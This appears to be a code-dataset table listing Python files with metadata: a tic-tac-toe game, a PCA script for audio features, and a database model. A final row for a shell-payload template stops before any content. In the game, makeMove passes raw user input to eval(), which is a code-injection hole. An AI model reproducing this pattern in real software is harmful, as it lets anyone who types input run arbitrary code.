hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b161de6456d6f8b14c33e69247fe9c0fa8b2fa93 | 23,850 | py | Python | TicTacToe2.py | tlively/N-TicTacToe | db1143e2e94012451ba590952670452431814b7b | [
"MIT"
] | 6 | 2017-10-03T13:37:54.000Z | 2020-12-21T07:34:01.000Z | TicTacToe2.py | tlively/N-TicTacToe | db1143e2e94012451ba590952670452431814b7b | [
"MIT"
] | null | null | null | TicTacToe2.py | tlively/N-TicTacToe | db1143e2e94012451ba590952670452431814b7b | [
"MIT"
] | 4 | 2017-07-04T18:53:52.000Z | 2021-03-24T03:15:07.000Z | # N-Dimensional Tic-Tac-Toe by Thomas Lively
from __future__ import division
import curses, curses.ascii, sys
# logical representation of the n-dimensional board as a single list
class Model(object):
def __init__(self, dimensions=2, size=0, players=2):
if size < 3:
size = dimensions+1
self.dimensions = dimensions
self.size = size
if self.size < 3:
self.size = 3
self.players = players
if self.players < 2 or self.players > 9:
self.players = 2
self.board = [0 for i in xrange(size**dimensions)]
self.current_player = 1
self.game_over = False
self.tied_game = False
self.moves = 0
# makes the next player the active player
def nextTurn(self):
self.current_player += 1
if self.current_player > self.players:
self.current_player = 1
return self.current_player
def playAtCoordinate(self, coord):
self.validateCoord(coord)
self.playAtIndex(self.getIndexFromCoord(coord))
# puts the current player's number into this index of the array then check game over
def playAtIndex(self, index):
self.validateIndex(index)
if self.board[index] != 0:
raise IllegalMoveError(index)
return
self.board[index] = self.current_player
seqs = self.getSequencesFromIndex(index)
for seq in seqs:
n = 0
for coord in seq:
if self.board[self.getIndexFromCoord(coord)] == self.current_player:
n += 1
if n == self.size:
self.game_over = True
break
self.moves += 1
if self.moves == self.size ** self.dimensions:
self.tied_game = True
self.game_over = True
def getIndexFromCoord(self, coord):
self.validateCoord(coord)
index = 0
for i in xrange(len(coord)-1,-1,-1):
index += coord[i]*(self.size**i)
return index
def getCoordFromIndex(self, index):
self.validateIndex(index)
coord_list = []
for i in xrange(self.dimensions):
nd = self.size**(self.dimensions-1-i)
coord_list.append(index//nd)
index %= nd
coord_list.reverse()
return tuple(coord_list)
def getSequencesFromIndex(self, index):
return self.getSequencesFromCoord(self.getCoordFromIndex(index))
# returns all the possible winning sequences containing this coordinate set
def getSequencesFromCoord(self, coord):
# from a set of indices, return a subset with elements indicated by the ones in
# bin_rep
def getIndexSet(indices, bin_rep):
iset = []
for i in xrange(len(indices)):
if bin_rep[i] == u"1":
iset.append(indices[i])
return iset
# given a set of indices that should be varied, return the n versions of coord
def getVariedSequences(varying_indices):
returned_sequences = []
for i in xrange(self.size):
new_coord = list(coord)
for index in varying_indices:
if coord[index] < self.size//2:
new_coord[index] = i
else:
new_coord[index] = self.size-i-1
returned_sequences.append(new_coord)
return returned_sequences
# given a set of indices that should be varied and a binary representation of
# the direction in which they should vary, return the n versions of coord
def getMidVariedSequences(varying_indices, vary_dir):
returned_sequences = []
for i in xrange(self.size):
new_coord = list(coord)
for j in xrange(len(varying_indices)):
if vary_dir[j] == u"1":
new_coord[varying_indices[j]] = i
else:
new_coord[varying_indices[j]] = self.size-i-1
returned_sequences.append(new_coord)
return returned_sequences
self.validateCoord(coord)
returned_sequences = []
# for values up to half if evenly sized, up to middle-1 if oddly sized
for x in xrange(self.size//2+1):
x2 = self.size-x-1
all_indices = []
for index in xrange(len(coord)):
if coord[index] == x or coord[index] == x2:
all_indices.append(index)
for i in xrange(1, 2 ** len(all_indices)):
bin_rep = bin(i)[2:]
while len(bin_rep) < len(all_indices):
bin_rep = u"0" + bin_rep
iset = getIndexSet(all_indices, bin_rep)
if x != x2:
returned_sequences.append(getVariedSequences(iset))
else:
for j in xrange(2 ** (len(iset)-1)):
dir_vary = bin(j)[2:]
while len(dir_vary) < len(iset):
dir_vary = u"0" + dir_vary
mid_sequences = getMidVariedSequences(iset, dir_vary)
returned_sequences.append(mid_sequences)
return returned_sequences
def validateIndex(self, index):
if index < 0 or index >= len(self.board):
raise ValueError(u"Invalid index")
def validateCoord(self, coord):
if len(coord) != self.dimensions:
raise ValueError(u"Coordinate needs " + unicode(self.dimensions) + u" dimensions")
return
for i in coord:
if i >= self.size or i < 0:
raise ValueError(u"0 <= coordinate < " + unicode(self.size))
return
# xy pairs from high order to low order to model coordinates
def XYCoordToCoord(self, xy):
coord = []
start = 0
if self.dimensions % 2 == 1:
start = 1
for i in xrange(start+1, len(xy), 2):
coord.insert(0, xy[i])
if start == 1:
coord.insert(0, xy[0])
for i in xrange(start, len(xy), 2):
coord.insert(0, xy[i])
return tuple(coord)
class IllegalMoveError(Exception):
def __init__(self, index):
self.index = index
def __str__(self):
return u"Illegal move at index " + unicode(self.index)
# A view for the model. Other views might use Curses or a graphics library
class PlainTextView():
def __init__(self, model):
self.model = model
self.create()
# returns the divider that goes between board units of the d-th horizontal order
def getHorizontalDivider(self, d):
if d < 0: return
if d == 0: return [u"|"]
if d == 1: return [u" "]
div = [u" ", u" "]
for i in xrange(d-1):
div.insert(1, u"|")
return div
# returns the divider that goes between board units of the d-th vertical order
def getVerticalDivider(self, d):
if d < 0: return
if d == 0: return [u"-"]
if d == 1: return [u" "]
div = [u" ", u" "]
for i in xrange(d-1):
div.insert(1, u"-")
return div
# recursively create the board as a matrix of characters
def createMatrix(self, d):
if d < 0: return
if d == 0: return [[u"X"]]
sub_block = self.createMatrix(d-1)
returned = []
if d % 2 == 1:
divider = self.getHorizontalDivider(d // 2)
for row in sub_block:
new_row = []
for char in row:
new_row.append(char)
for i in xrange(self.model.size - 1):
for char in divider:
new_row.append(char)
for char in row:
new_row.append(char)
returned.append(new_row)
return returned
if d % 2 == 0:
divider = self.getVerticalDivider(d // 2 - 1)
for row in sub_block:
new_row = []
for char in row:
new_row.append(char)
returned.append(new_row)
for i in xrange (self.model.size - 1):
for char in divider:
new_row = []
for j in xrange(len(sub_block[0])):
new_row.append(char)
returned.append(new_row)
for row in sub_block:
new_row = []
for char in row:
new_row.append(char)
returned.append(new_row)
return returned
# use the matrix of characters that make up the board to create maps from the
# representation's indices to the models and vice versa, and create an str
def create(self):
matrix = self.createMatrix(self.model.dimensions)
self.str_rep = u""
for row in matrix:
for char in row:
self.str_rep += char
self.str_rep += u"\n"
#print(str_rep)
self.model_to_view = dict()
self.view_to_model = dict()
model_index = 0
for i in xrange(len(self.str_rep)):
if self.str_rep[i] == u"X":
self.str_rep = self.str_rep.replace(u"X", u" ", 1)
self.model_to_view[model_index] = i
self.view_to_model[i] = model_index
model_index += 1
# given char from model, return char for display
def getDisplayChar(self, c):
if c == 0: return u" "
if self.model.players == 2:
if c == 1: return u"X"
if c == 2: return u"O"
return unicode(c)
# must be called to update the view when the state of index i in the model changes
def update(self, i):
index = self.model_to_view[i]
char = self.getDisplayChar(self.model.board[i])
self.str_rep = self.str_rep[:index] + char + self.str_rep[index+1:]
def __str__(self):
return self.str_rep
# serves as a "Main" class and controls user interface with model and view
class TextGameController():
def __init__(self):
dimensions = int(raw_input(u"dimensions: "))
size = int(raw_input(u"size: "))
players = int(raw_input(u"players: "))
print u"creating model..."
self.board = Model(dimensions, size, players)
print u"creating view..."
self.view = PlainTextView(self.board)
while True:
print
print self.view
print
player = u"Player " + unicode(self.board.current_player)
coord = self.makeMove(player + u": ")
self.view.update(self.board.getIndexFromCoord(coord))
if self.board.game_over:
if self.board.tied_game:
print u"It's a tie :("
break
print self.view
print
print player + u" wins!"
break
self.board.nextTurn()
# transform user input to model coordinates
# and coordinates through necessary checks, repeating if necessary
def makeMove(self, prompt):
coord = None
while True:
try:
raw_in = eval(u"(" + raw_input(prompt) + u")")
coord = self.board.XYCoordToCoord(raw_in)
print coord
except Exception, e:
print u"Unrecognizable input"
continue
try:
self.board.validateCoord(coord)
except Exception, e:
print e
continue
try:
self.board.playAtCoordinate(coord)
break
except Exception, e:
print u"Illegal move!"
continue
return coord
class CursesController(object):
def main(self, stdscr):
model = self.model
view = self.view
def alert():
curses.beep()
curses.flash()
uneven = model.dimensions % 2 != 0
locked_coords = []
selected_x = model.size // 2
selected_y = 0
if not (len(locked_coords) == 0 and uneven):
selected_y = model.size // 2
def getEnclosingRectangle(coord):
extension = xrange(model.dimensions - len(coord))
min_xycoord = coord[:]
min_xycoord.extend([0 for i in extension])
min_coord = model.XYCoordToCoord(min_xycoord)
max_xycoord = coord[:]
max_xycoord.extend([model.size-1 for i in extension])
max_coord = model.XYCoordToCoord(max_xycoord)
min_index = view.model_to_view[model.getIndexFromCoord(min_coord)]
min_index = min_index - unicode(view).count(u"\n",0, min_index)
max_index = view.model_to_view[model.getIndexFromCoord(max_coord)]
max_index = max_index - unicode(view).count(u"\n",0, max_index)
length = unicode(view).find(u"\n")
min_x = min_index % length
min_y = min_index // length
max_x = max_index % length
max_y = max_index // length
return (min_y,min_x,max_y,max_x)
def getPlayerColor(p):
colors = {1:4,2:1,3:2,4:3,5:5,6:6,7:7,8:5,9:7}
return int(colors[((p-1)%9)+1])
curses.curs_set(0)
win = curses.newpad(unicode(view).count(u"\n")+1, unicode(view).find(u"\n")+1)
for i in xrange(1,8):
curses.init_pair(i,i,0)
history = []
initialized = False
while not model.game_over:
stdscr.clear()
# Title Box Outline
stdscr.addch(0,0,curses.ACS_ULCORNER)
stdscr.hline(0,1,curses.ACS_HLINE,curses.COLS-2)
stdscr.addch(0,curses.COLS-1,curses.ACS_URCORNER)
stdscr.vline(1,0,curses.ACS_VLINE,3)
stdscr.vline(1,curses.COLS-1,curses.ACS_VLINE,3)
panel_width = model.dimensions * 2 + 11
# Board Area Outline
stdscr.addch(4,0,curses.ACS_ULCORNER)
stdscr.hline(4,1,curses.ACS_HLINE,curses.COLS-panel_width-1)
stdscr.addch(curses.LINES-1,0,curses.ACS_LLCORNER)
stdscr.hline(curses.LINES-1,1,curses.ACS_HLINE,curses.COLS-panel_width-1)
stdscr.vline(5,0,curses.ACS_VLINE,curses.LINES-6)
# Top Panel Box Outline
stdscr.addch(4,curses.COLS-panel_width,curses.ACS_ULCORNER)
stdscr.hline(4,curses.COLS-panel_width+1,curses.ACS_HLINE,panel_width-2)
stdscr.addch(4,curses.COLS-1,curses.ACS_URCORNER)
stdscr.vline(5,curses.COLS-panel_width,curses.ACS_VLINE,4)
stdscr.vline(5,curses.COLS-1,curses.ACS_VLINE,4)
stdscr.addch(9,curses.COLS-panel_width,curses.ACS_LLCORNER)
stdscr.addch(9,curses.COLS-1,curses.ACS_LRCORNER)
stdscr.hline(9,curses.COLS-panel_width+1,curses.ACS_HLINE,panel_width-2)
# Bottom Panel OUTLINE
stdscr.vline(10,curses.COLS-panel_width,curses.ACS_VLINE,curses.LINES-11)
stdscr.vline(10,curses.COLS-1,curses.ACS_VLINE,curses.LINES-11)
stdscr.addch(curses.LINES-1,curses.COLS-panel_width,curses.ACS_LLCORNER)
stdscr.hline(curses.LINES-1,curses.COLS-panel_width+1,
curses.ACS_HLINE,panel_width-2)
try:stdscr.addch(curses.LINES-1,curses.COLS-1,curses.ACS_LRCORNER)
except:pass
title = u"N-Dimensional Tic-Tac-Toe ({0}^{1})"\
.format(model.size,model.dimensions)
stdscr.addstr(2, curses.COLS//2 - len(title)//2, title)
# Get input
key = None
curses.flushinp()
if initialized:
key = win.getch()
else:
initialized = True
if key == ord(u"w"):
if selected_y == 0 or len(locked_coords) == 0 and uneven:
alert()
else:
selected_y -= 1
if key == ord(u"s"):
if selected_y == model.size-1 or len(locked_coords) == 0 and uneven:
alert()
else:
selected_y += 1
if key == ord(u"a"):
if selected_x == 0:
alert()
else:
selected_x -= 1
if key == ord(u"d"):
if selected_x == model.size-1:
alert()
else:
selected_x += 1
if key == ord(u"\n"):
locked_coords.append(selected_x)
if not (len(locked_coords) == 1 and uneven):
locked_coords.append(selected_y)
selected_x = model.size // 2
selected_y = 0
if not (len(locked_coords) == 0 and uneven):
selected_y = model.size // 2
if len(locked_coords) == model.dimensions:
try:
coord = model.XYCoordToCoord(locked_coords)
model.playAtCoordinate(coord)
view.update(model.getIndexFromCoord(coord))
history.insert(0, (model.current_player, locked_coords[:]))
del locked_coords[:]
selected_x = model.size // 2
selected_y = 0
if not (len(locked_coords) == 0 and uneven):
selected_y = model.size // 2
if not model.game_over:
model.nextTurn()
except Exception:
key = curses.ascii.ESC
if key == curses.ascii.ESC:
if len(locked_coords) == 0:
alert()
else:
selected_y = locked_coords[-1]
del locked_coords[-1]
if not (len(locked_coords) == 0):
selected_x = locked_coords[-1]
del locked_coords[-1]
else:
selected_x = selected_y
selected_y = 0
# Draw info box contents
info_line = u"Player {0}".format(model.current_player)
stdscr.addstr(6, int(curses.COLS-(panel_width + len(info_line))/2),
info_line,
curses.color_pair(
getPlayerColor(
model.current_player)))
info_coord = locked_coords[:]
info_coord.append(selected_x)
if not (len(locked_coords) == 0 and uneven):
info_coord.append(selected_y)
info_line = unicode(info_coord)[1:-1].replace(u" ", u"")
stdscr.addstr(7, int(curses.COLS-(panel_width + len(info_line))/2),
info_line,
curses.color_pair(
getPlayerColor(
model.current_player)))
# Draw move history
for i, move in enumerate(history):
if 10 + i == curses.LINES -1:
break
p, loc = move
loc = unicode(loc)[1:-1].replace(u" ", u"")
stdscr.addstr(10+i, curses.COLS-panel_width+1,
u"Player {0}: {1}".format(p, loc),
curses.color_pair(getPlayerColor(p)))
# Draw board
win.addstr(0,0, unicode(view))
# Highlight selected area
coord = locked_coords[:]
coord.append(selected_x)
if not (len(locked_coords) == 0 and uneven):
coord.append(selected_y)
min_y,min_x,max_y,max_x = getEnclosingRectangle(coord)
for y in xrange(min_y, max_y+1):
win.chgat(y, min_x, max_x + 1 - min_x,
curses.A_REVERSE |
curses.color_pair(getPlayerColor(model.current_player)))
# Highlight past moves
for p, loc in history:
rect = getEnclosingRectangle(loc)
current = win.inch(rect[0], rect[1])
if current == current | curses.A_REVERSE:
win.chgat(rect[0], rect[1], 1, curses.color_pair(getPlayerColor(p)))
else:
win.chgat(rect[0], rect[1], 1,
curses.color_pair(getPlayerColor(p)) | curses.A_REVERSE)
# Calculate area of board to display
pminrow = 0
pmincol = 0
pheight = unicode(view).count(u"\n")-1
pwidth = unicode(view).find(u"\n")-1
sminrow = 5
smincol = 1
smaxrow = curses.LINES-2
smaxcol = curses.COLS-panel_width-1
sheight = smaxrow - sminrow
swidth = smaxcol - smincol
if pheight <= sheight:
dif = sheight - pheight
sminrow += dif // 2
else:
pminrow1 = min_y - sheight * min_y / pheight
pminrow2 = sheight/pheight*(pheight-max_y) + max_y - sheight
dif1 = min_y
dif2 = pheight - max_y
if not (dif1 == 0 and dif2 == 0):
pminrow = int((pminrow1 * dif2 + pminrow2 * dif1) / (dif1 + dif2)+.5)
else:
dif = sheight - pheight
sminrow += dif // 2
if pwidth <= swidth:
dif = swidth - pwidth
smincol += dif // 2
else:
pmincol1 = min_x - swidth * min_x / pwidth
pmincol2 = swidth/pwidth*(pwidth-max_x) + max_x - swidth
dif1 = min_x
dif2 = pwidth - max_x
if not (dif1 == 0 and dif2 == 0):
pmincol = int((pmincol1 * dif2 + pmincol2 * dif1) / (dif1 + dif2)+.5)
else:
dif = swidth - pwidth
smincol += dif // 2
# Refresh the display
stdscr.refresh()
win.refresh(pminrow, pmincol, sminrow, smincol, smaxrow, smaxcol)
stdscr.clear()
win.clear()
if not model.tied_game:
player = model.current_player
message = u"PLAYER {0} WINS!".format(player)
stdscr.addstr(curses.LINES//2, int((curses.COLS - len(message))/2+.5), message,
curses.A_BLINK | curses.A_REVERSE | curses.color_pair(getPlayerColor(player)))
else:
message = u"IT'S A TIE :("
stdscr.addstr(curses.LINES//2, int((curses.COLS - len(message))/2+.5), message,
curses.A_BLINK | curses.A_REVERSE)
stdscr.getch()
def __init__(self, model):
self.model = model
self.view = PlainTextView(self.model)
curses.wrapper(self.main)
# run the game if run as a script
if __name__ == u"__main__":
#TextGameController()
args = [int(i) for i in sys.argv[1:]]
if args:
CursesController(Model(*args))
else:
CursesController(Model(4))
| 38.405797 | 94 | 0.512704 | 2,769 | 23,850 | 4.293969 | 0.12026 | 0.021026 | 0.009588 | 0.015139 | 0.375021 | 0.313541 | 0.269975 | 0.216989 | 0.183516 | 0.169722 | 0 | 0.020806 | 0.391405 | 23,850 | 620 | 95 | 38.467742 | 0.798347 | 0.076855 | 0 | 0.30315 | 0 | 0 | 0.015743 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.001969 | 0.003937 | null | null | 0.025591 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b1623f67cebbb4df1eda133e8176caaaf6a0be46 | 4,819 | py | Python | src/classical_ml/pca.py | Jagriti-dixit/CS229_Project_Final | 16fdb55086411dee17153e88b2499c378cdfc096 | [
"MIT"
] | null | null | null | src/classical_ml/pca.py | Jagriti-dixit/CS229_Project_Final | 16fdb55086411dee17153e88b2499c378cdfc096 | [
"MIT"
] | null | null | null | src/classical_ml/pca.py | Jagriti-dixit/CS229_Project_Final | 16fdb55086411dee17153e88b2499c378cdfc096 | [
"MIT"
] | null | null | null | import sys
import time
from comet_ml import Experiment
import pydub
import numpy as np
from pydub import AudioSegment
import librosa
import librosa.display
import matplotlib.pyplot as plt
import sklearn
from sklearn import preprocessing
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
import pandas as pd
from pathlib import Path
import math,random
import zipfile as zf
import soundfile as sf
import pandas as pd
from sklearn import metrics
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.feature_selection import RFE
import json
import matplotlib.pyplot as plt
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import accuracy_score
from sklearn.metrics import ConfusionMatrixDisplay
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.metrics import accuracy_score, classification_report, precision_score, recall_score
from sklearn.metrics import confusion_matrix, precision_recall_curve, roc_curve, auc, log_loss
from sklearn.datasets import make_classification
from sklearn.metrics import plot_confusion_matrix
from sklearn.ensemble import RandomForestClassifier
from sklearn import svm
import getSamples as gs
from sklearn.metrics import precision_score, \
recall_score, confusion_matrix, classification_report, \
accuracy_score, f1_score
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
import seaborn as sns
train_file = sys.argv[1]
test_file = sys.argv[2]
print("Reading train and test dataset")
#train = pd.read_csv('train_data_noise_pad.csv')
train = pd.read_csv(train_file)
print("read train data")
#test = pd.read_csv('test_data_noise_pad.csv')
test = pd.read_csv(test_file)
print("read test data")
print("Read two big files ")
X_train = train.iloc[:,:2040]
y_train = train.iloc[:,2041]
X_test = test.iloc[:,:2040]
y_test = test.iloc[:,2041]
# X_train = train.iloc[:,:20]
# y_train = train.iloc[:,21]
# X_test = test.iloc[:,:20]
# y_test = test.iloc[:,21]
X_train = StandardScaler(with_mean=True).fit_transform(X_train)
X_test = StandardScaler(with_mean=True).fit_transform(X_test)
print("Mean of train data is ",np.mean(X_train),"Std deviation is",np.std(X_train))
pca = PCA(n_components = 'mle')
pca = PCA().fit(X_train)
print('Explained variation per principal component:{}'.format((pca.explained_variance_ratio_)))
plt.plot(np.cumsum(pca.explained_variance_ratio_))
plt.xlabel('number of components')
plt.ylabel('Cumulative explained variance')
plt.savefig("cumulative_variance_plot.png")
time_start = time.time()
print("we want to see the accumulated variance of 700 features ")
pca = PCA(n_components = 700)
pca_result = pca.fit_transform(X_train)
pca_test = pca.transform(X_test)
X_train_pca = pca_result
X_test_pca = pca_test
out_train = "train_pca.csv"
pca_train = pd.DataFrame(data=X_train_pca)
pca_train['language'] = y_train
out_file_train = open(out_train,'wb')
pca_train.to_csv(out_file_train,index=False)
out_file_train.close()
out_test = "test_pca.csv"
pca_test = pd.DataFrame(data=X_test_pca)
pca_test['language'] = y_test
out_file_test = open(out_test,'wb')
pca_test.to_csv(out_file_test,index=False)
out_file_test.close()
time_start = time.time()
print("shapes are",X_train_pca.shape,y_train.shape)
print("X_train shape is ",X_train_pca.shape,"X_test shape is",X_test_pca.shape)
print("Total variation in these 1000 features is",np.sum(pca.explained_variance_ratio_))
print('PCA done! Time elapsed: {} seconds'.format(time.time()-time_start))
print("Now lets plot PCA for 2D visualisation")
##Taking only some of the total dataset randomly for plotting
np.random.seed(42)
rndperm = np.random.permutation(train.shape[0])
#2D plot(Having two components)
plt.figure(figsize=(16,10))
pca = PCA(n_components = 2)
pca_result = pca.fit_transform(X_train)
train['pca_one'] = pca_result[:,0]
train['pca_two'] = pca_result[:,1]
sns.scatterplot(
x="pca_one", y="pca_two",
hue="2041",
palette=sns.color_palette("hls", 3),
data=train.loc[rndperm,:],
legend="full",
alpha=0.3
)
plt.savefig("PCA_2d.png")
###PCA with 3 components
pca = PCA(n_components = 3)
pca_result = pca.fit_transform(X_train)
train['pca_one'] = pca_result[:,0]
train['pca_two'] = pca_result[:,1]
train['pca_three'] = pca_result[:,2]
print("Its processing 3d plot")
#3D plot(Having 3 components)
ax = plt.figure(figsize=(16,10)).gca(projection='3d')
ax.scatter(
xs=train.loc[rndperm,:]["pca_one"],
ys=train.loc[rndperm,:]["pca_two"],
zs=train.loc[rndperm,:]["pca_three"],
c=train.loc[rndperm,:]["2041"],
cmap='tab10'
)
ax.set_xlabel('pca_one')
ax.set_ylabel('pca_two')
ax.set_zlabel('pca_three')
plt.savefig("PCA_3d.png")
| 31.496732 | 97 | 0.775265 | 763 | 4,819 | 4.68152 | 0.266055 | 0.06467 | 0.030235 | 0.040314 | 0.226764 | 0.116461 | 0.095745 | 0.06551 | 0.040314 | 0.040314 | 0 | 0.017886 | 0.106661 | 4,819 | 152 | 98 | 31.703947 | 0.811847 | 0.069724 | 0 | 0.104839 | 0 | 0 | 0.147427 | 0.006264 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.330645 | 0 | 0.330645 | 0.104839 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
b166eaf0f74796997babad39184ea07ba1f3c842 | 948 | py | Python | main/models/sign.py | fakegit/gxgk-wechat-server | 89ad21bcd2dcd1c28e43d4b230d47207e78098b3 | [
"MIT"
] | 1,564 | 2015-09-01T13:11:02.000Z | 2022-03-29T08:44:56.000Z | main/models/sign.py | fakegit/gxgk-wechat-server | 89ad21bcd2dcd1c28e43d4b230d47207e78098b3 | [
"MIT"
] | 11 | 2015-12-13T05:04:15.000Z | 2019-09-10T06:14:03.000Z | main/models/sign.py | fakegit/gxgk-wechat-server | 89ad21bcd2dcd1c28e43d4b230d47207e78098b3 | [
"MIT"
] | 649 | 2015-12-11T09:23:09.000Z | 2022-03-04T17:31:28.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from . import db
class Sign(db.Model):
__table_args__ = {
'mysql_engine': 'InnoDB',
'mysql_charset': 'utf8mb4'
}
openid = db.Column(db.String(32), primary_key=True, unique=True,
nullable=False)
lastsigntime = db.Column(db.BigInteger, default=0, nullable=False)
totaldays = db.Column(db.SmallInteger, default=0, nullable=False)
keepdays = db.Column(db.SmallInteger, default=0, nullable=False)
def __init__(self, openid, lastsigntime, totaldays, keepdays):
self.openid = openid
self.lastsigntime = lastsigntime
self.totaldays = totaldays
self.keepdays = keepdays
def __repr__(self):
return '<openid %r>' % self.openid
def save(self):
db.session.add(self)
db.session.commit()
return self
def update(self):
db.session.commit()
return self
| 26.333333 | 70 | 0.619198 | 109 | 948 | 5.238532 | 0.440367 | 0.056042 | 0.070053 | 0.110333 | 0.252189 | 0.252189 | 0.150613 | 0.150613 | 0 | 0 | 0 | 0.01138 | 0.258439 | 948 | 35 | 71 | 27.085714 | 0.800853 | 0.044304 | 0 | 0.16 | 0 | 0 | 0.054204 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.16 | false | 0 | 0.04 | 0.04 | 0.56 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
b17399bedc9351d3452e2254d35db67407d43d19 | 11,201 | py | Python | payload_templates/lin_shell_payload.py | ahirejayeshbapu/python-shell | 3560fe03f89557c1189255ca2737accdeda48faf | [
"MIT"
